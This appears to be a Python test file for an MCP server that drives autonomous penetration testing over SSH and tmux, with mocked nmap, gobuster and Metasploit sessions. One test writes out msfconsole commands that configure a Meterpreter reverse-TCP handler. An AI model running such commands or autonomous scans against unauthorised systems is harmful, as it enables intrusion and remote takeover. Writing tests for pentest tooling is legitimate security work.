#!/usr/bin/env python3
"""
End-to-end pentesting workflow tests.
Tests complete autonomous pentest scenarios.
These tests validate the entire system working together:
- Session management
- Command execution
- Trigger system
- Output parsing
- Error handling
"""
import pytest
import pytest_asyncio
import asyncio
import time
from unittest.mock import Mock, AsyncMock, patch
from pentest_mcp_server import PentestMCPServer
from pentest_mcp_server.ssh_manager import SSHManager
from pentest_mcp_server.tmux_manager import TmuxManager
@pytest.mark.asyncio
@pytest.mark.integration
class TestNetworkReconWorkflow:
"""Test complete network reconnaissance workflow."""
@pytest_asyncio.fixture
async def mock_server(self):
"""Create a mock MCP server for testing."""
server = PentestMCPServer()
# Mock SSH and Tmux managers
server.ssh_manager = Mock(spec=SSHManager)
server.tmux_manager = Mock(spec=TmuxManager)
# Mock SSH connection
server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
server.ssh_manager.run_command = AsyncMock()
# Mock Tmux operations
server.tmux_manager.create_session = AsyncMock(return_value={
"status": "created",
"session_id": "test_session"
})
server.tmux_manager.execute_command = AsyncMock(return_value={
"status": "sent"
})
server.tmux_manager.capture_pane = AsyncMock()
server.tmux_manager.kill_session = AsyncMock(return_value={
"status": "killed"
})
return server
async def test_basic_nmap_scan_workflow(self, mock_server):
"""
Test basic nmap scanning workflow:
1. Create session
2. Run nmap scan
3. Wait for completion
4. Read results
5. Cleanup
"""
# Phase 1: Create session
create_result = await mock_server._handle_create_session({
"session_id": "nmap_scan"
})
assert create_result["status"] == "created"
# Phase 2: Execute nmap scan
# Mock progressive output
scan_outputs = [
"Starting Nmap 7.94...",
"Nmap scan report for 127.0.0.1",
"Host is up (0.00010s latency).",
"PORT STATE SERVICE VERSION",
"22/tcp open ssh OpenSSH 8.9",
"80/tcp open http Apache 2.4.52",
"Nmap done: 1 IP address (1 host up) scanned in 2.34 seconds",
"root@kali:~# "
]
output_index = [0]
def get_progressive_output(*args, **kwargs):
if output_index[0] < len(scan_outputs):
output_index[0] += 1
return {
"status": "success",
"output": "\n".join(scan_outputs[:output_index[0]])
}
mock_server.tmux_manager.capture_pane.side_effect = get_progressive_output
# Execute with trigger
with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
trigger_instance = MockTrigger.return_value
trigger_instance.monitor_session_with_triggers = AsyncMock(return_value={
"status": "trigger_matched",
"trigger": {
"trigger_name": "scan_complete",
"trigger_type": "regex"
},
"output": "\n".join(scan_outputs),
"execution_time": 2.5
})
scan_result = await mock_server._handle_execute({
"session_id": "nmap_scan",
"command": "nmap -sV 127.0.0.1",
"triggers": [
{"type": "regex", "pattern": "Nmap done", "name": "scan_complete"}
],
"max_timeout": 60
})
assert scan_result["status"] == "trigger_matched"
assert "Nmap done" in scan_result["output"]
assert "22/tcp" in scan_result["output"]
# Phase 3: Cleanup
cleanup_result = await mock_server._handle_kill_session({
"session_id": "nmap_scan"
})
assert cleanup_result["status"] == "killed"
print("✓ Basic nmap scan workflow completed successfully")
async def test_parallel_scanning_workflow(self, mock_server):
"""
Test running multiple scans in parallel:
1. Create multiple sessions
2. Start scans in background
3. Monitor all sessions
4. Collect results
"""
sessions = ["scan1", "scan2", "scan3"]
# Create multiple sessions
for session_id in sessions:
result = await mock_server._handle_create_session({
"session_id": session_id
})
assert result["status"] == "created"
# Start background scans
commands = [
"nmap -p 22 192.168.1.1",
"nmap -p 80 192.168.1.2",
"nmap -p 443 192.168.1.3"
]
for session_id, command in zip(sessions, commands):
result = await mock_server._handle_execute({
"session_id": session_id,
"command": command,
"background": True
})
assert result["status"] == "background"
# Verify all sessions are running
mock_server.tmux_manager.list_sessions = AsyncMock(return_value=[
{"session_id": sid, "status": "active"} for sid in sessions
])
list_result = await mock_server._handle_list_sessions({})
assert len(list_result["sessions"]) == 3
print("✓ Parallel scanning workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestWebApplicationWorkflow:
"""Test web application penetration testing workflow."""
@pytest_asyncio.fixture
async def mock_server(self):
"""Create a mock MCP server for testing."""
server = PentestMCPServer()
server.ssh_manager = Mock(spec=SSHManager)
server.tmux_manager = Mock(spec=TmuxManager)
server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
server.tmux_manager.create_session = AsyncMock(return_value={
"status": "created",
"session_id": "web_test"
})
server.tmux_manager.execute_command = AsyncMock(return_value={
"status": "sent"
})
server.tmux_manager.capture_pane = AsyncMock()
server.tmux_manager.kill_session = AsyncMock(return_value={
"status": "killed"
})
return server
async def test_directory_enumeration_workflow(self, mock_server):
"""
Test directory enumeration with gobuster:
1. Create session
2. Run gobuster
3. Wait for completion
4. Parse results
"""
# Create session
create_result = await mock_server._handle_create_session({
"session_id": "gobuster"
})
assert create_result["status"] == "created"
# Mock gobuster output
gobuster_output = """
===============================================================
Gobuster v3.6
===============================================================
[+] Url: http://192.168.1.100
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
===============================================================
/admin (Status: 200) [Size: 1234]
/login (Status: 200) [Size: 2345]
/uploads (Status: 301) [Size: 0]
/backup.zip (Status: 200) [Size: 5678]
===============================================================
Finished
===============================================================
root@kali:~#
"""
mock_server.tmux_manager.capture_pane.return_value = {
"status": "success",
"output": gobuster_output
}
# Execute gobuster
with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
trigger_instance = MockTrigger.return_value
trigger_instance.monitor_session_with_triggers = AsyncMock(return_value={
"status": "trigger_matched",
"trigger": {"trigger_name": "prompt_detected"},
"output": gobuster_output,
"execution_time": 15.3
})
result = await mock_server._handle_execute({
"session_id": "gobuster",
"command": "gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirb/common.txt",
"triggers": [{"type": "prompt"}]
})
assert result["status"] == "trigger_matched"
assert "/admin" in result["output"]
assert "/uploads" in result["output"]
print("✓ Directory enumeration workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestExploitationWorkflow:
"""Test exploitation workflow with Metasploit."""
@pytest_asyncio.fixture
async def mock_server(self):
"""Create a mock MCP server for testing."""
server = PentestMCPServer()
server.ssh_manager = Mock(spec=SSHManager)
server.tmux_manager = Mock(spec=TmuxManager)
server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
server.tmux_manager.create_session = AsyncMock(return_value={
"status": "created",
"session_id": "msf"
})
server.tmux_manager.execute_command = AsyncMock(return_value={
"status": "sent"
})
server.tmux_manager.capture_pane = AsyncMock()
server.tmux_manager.send_input = AsyncMock(return_value={
"status": "sent"
})
server.tmux_manager.kill_session = AsyncMock(return_value={
"status": "killed"
})
return server
async def test_metasploit_interactive_workflow(self, mock_server):
"""
Test interactive Metasploit workflow:
1. Start msfconsole
2. Configure exploit
3. Set payload
4. Execute exploit
5. Interact with session
"""
# Create session
create_result = await mock_server._handle_create_session({
"session_id": "msf"
})
assert create_result["status"] == "created"
# Start msfconsole
msf_startup = """
=[ metasploit v6.3.25-dev ]
+ -- --=[ 2345 exploits - 1234 auxiliary - 456 post ]
+ -- --=[ 1234 payloads - 56 encoders - 12 nops ]
msf6 >
"""
mock_server.tmux_manager.capture_pane.return_value = {
"status": "success",
"output": msf_startup
}
with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
trigger_instance = MockTrigger.return_value
trigger_instance.monitor_session_with_triggers = AsyncMock(return_value={
"status": "trigger_matched",
"trigger": {"trigger_name": "msf_ready", "trigger_type": "regex"},
"output": msf_startup,
"execution_time": 5.2
})
start_result = await mock_server._handle_execute({
"session_id": "msf",
"command": "msfconsole -q",
"triggers": [{"type": "regex", "pattern": "msf6 >", "name": "msf_ready"}],
"max_timeout": 30
})
assert start_result["status"] == "trigger_matched"
assert "msf6 >" in start_result["output"]
# Send commands to msfconsole
commands = [
"use exploit/multi/handler",
"set PAYLOAD linux/x64/meterpreter/reverse_tcp",
"set LHOST 192.168.1.10",
"set LPORT 4444"
]
for cmd in commands:
result = await mock_server._handle_send_input({
"session_id": "msf",
"input": cmd,
"press_enter": True
})
assert result["status"] == "sent"
print("✓ Metasploit interactive workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestErrorRecoveryWorkflow:
"""Test error handling and recovery scenarios."""
@pytest_asyncio.fixture
async def mock_server(self):
"""Create a mock MCP server for testing."""
server = PentestMCPServer()
server.ssh_manager = Mock(spec=SSHManager)
server.tmux_manager = Mock(spec=TmuxManager)
return server
async def test_connection_loss_recovery(self, mock_server):
"""
Test recovery from connection loss:
1. Create session
2. Simulate connection loss
3. Auto-reconnect
4. Recover session
5. Continue operation
"""
# Initial connection
mock_server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
mock_server.tmux_manager.create_session = AsyncMock(return_value={
"status": "created",
"session_id": "recovery_test"
})
create_result = await mock_server._handle_create_session({
"session_id": "recovery_test"
})
assert create_result["status"] == "created"
# Simulate connection loss and recovery
connection_attempts = [False, False, True] # Fail twice, then succeed
attempt_index = [0]
def mock_reconnect(*args, **kwargs):
result = connection_attempts[attempt_index[0]]
if attempt_index[0] < len(connection_attempts) - 1:
attempt_index[0] += 1
return result
mock_server.ssh_manager.ensure_connected = AsyncMock(side_effect=mock_reconnect)
# Attempt operation during connection issues
for i in range(3):
connected = await mock_server.ssh_manager.ensure_connected()
if connected:
break
assert connected == True
# Recover sessions
mock_server.tmux_manager.recover_sessions = AsyncMock(return_value=[
"recovery_test"
])
mock_server.tmux_manager.get_session_info = Mock(return_value=Mock(created_at=time.time() - 100))
mock_server.tmux_manager.capture_pane = AsyncMock(return_value={
"status": "success",
"output": "test output"
})
recovery_result = await mock_server._handle_recover_sessions({})
assert recovery_result["status"] == "success"
assert len(recovery_result["recovered_sessions"]) > 0
print("✓ Connection loss recovery workflow completed successfully")
async def test_command_error_detection(self, mock_server):
"""
Test automatic error detection in command output:
1. Execute command that fails
2. Detect error automatically
3. Provide helpful suggestion
"""
mock_server.ssh_manager.ensure_connected = AsyncMock(return_value=True)
mock_server.tmux_manager.create_session = AsyncMock(return_value={
"status": "created",
"session_id": "error_test"
})
mock_server.tmux_manager.execute_command = AsyncMock(return_value={
"status": "sent"
})
# Create session
await mock_server._handle_create_session({"session_id": "error_test"})
# Mock command with error
error_output = """
root@kali:~# nonexistent_command
bash: nonexistent_command: command not found
root@kali:~#
"""
mock_server.tmux_manager.capture_pane = AsyncMock(return_value={
"status": "success",
"output": error_output
})
with patch('pentest_mcp_server.trigger_system.TriggerSystem') as MockTrigger:
trigger_instance = MockTrigger.return_value
trigger_instance.monitor_session_with_triggers = AsyncMock(return_value={
"status": "trigger_matched",
"trigger": {"trigger_name": "prompt_detected"},
"output": error_output,
"execution_time": 0.5,
"error_detected": {
"error_detected": True,
"error_pattern": "command not found",
"suggestion": "Tool may not be installed. Try: apt install <tool>"
}
})
result = await mock_server._handle_execute({
"session_id": "error_test",
"command": "nonexistent_command",
"triggers": [{"type": "prompt"}]
})
assert result["status"] == "trigger_matched"
assert "command not found" in result["output"]
print("✓ Command error detection workflow completed successfully")
@pytest.mark.asyncio
@pytest.mark.integration
class TestSystemMonitoringWorkflow:
"""Test system monitoring and resource management."""
@pytest_asyncio.fixture
async def mock_server(self):
"""Create a mock MCP server for testing."""
server = PentestMCPServer()
server.ssh_manager = Mock(spec=SSHManager)
server.tmux_manager = Mock(spec=TmuxManager)
return server
async def test_system_status_monitoring(self, mock_server):
"""
Test system status monitoring:
1. Get system information
2. Check resource usage
3. Monitor active sessions
"""
# Mock system info
mock_server.ssh_manager.get_system_info = AsyncMock(return_value={
"hostname": "kali-pentest",
"uptime": "up 2 days, 3:45",
"kernel": "5.18.0-kali5-amd64",
"cpu_info": "4",
"memory": "45.2,4096,8192",
"disk": "35% 28G 80G"
})
mock_server.ssh_manager.get_connection_status = Mock(return_value={
"connected": True,
"host": "192.168.1.100",
"port": 22,
"user": "root"
})
mock_server.tmux_manager.list_sessions = AsyncMock(return_value=[
{"session_id": "scan1", "status": "active"},
{"session_id": "scan2", "status": "active"}
])
# Get system status
status_result = await mock_server._handle_get_system_status({})
assert status_result["status"] == "success"
assert status_result["active_sessions"] == 2
assert status_result["connection_status"]["connected"] == True
assert "hostname" in status_result["system_info"]
print("✓ System status monitoring workflow completed successfully")
async def run_all_workflow_tests():
"""Run all workflow tests manually."""
print("\n" + "="*60)
print("Running Full Workflow Tests")
print("="*60 + "\n")
# Network Recon Tests
print("📡 Network Reconnaissance Workflow Tests")
print("-" * 60)
test_recon = TestNetworkReconWorkflow()
mock_server = await test_recon.mock_server()
await test_recon.test_basic_nmap_scan_workflow(mock_server)
await test_recon.test_parallel_scanning_workflow(mock_server)
# Web Application Tests
print("\n🌐 Web Application Workflow Tests")
print("-" * 60)
test_web = TestWebApplicationWorkflow()
mock_server = await test_web.mock_server()
await test_web.test_directory_enumeration_workflow(mock_server)
# Exploitation Tests
print("\n💥 Exploitation Workflow Tests")
print("-" * 60)
test_exploit = TestExploitationWorkflow()
mock_server = await test_exploit.mock_server()
await test_exploit.test_metasploit_interactive_workflow(mock_server)
# Error Recovery Tests
print("\n🔧 Error Recovery Workflow Tests")
print("-" * 60)
test_error = TestErrorRecoveryWorkflow()
mock_server = await test_error.mock_server()
await test_error.test_connection_loss_recovery(mock_server)
await test_error.test_command_error_detection(mock_server)
# System Monitoring Tests
print("\n📊 System Monitoring Workflow Tests")
print("-" * 60)
test_monitor = TestSystemMonitoringWorkflow()
mock_server = await test_monitor.mock_server()
await test_monitor.test_system_status_monitoring(mock_server)
print("\n" + "="*60)
print("✅ All Workflow Tests Completed Successfully!")
print("="*60 + "\n")
if __name__ == "__main__":
asyncio.run(run_all_workflow_tests())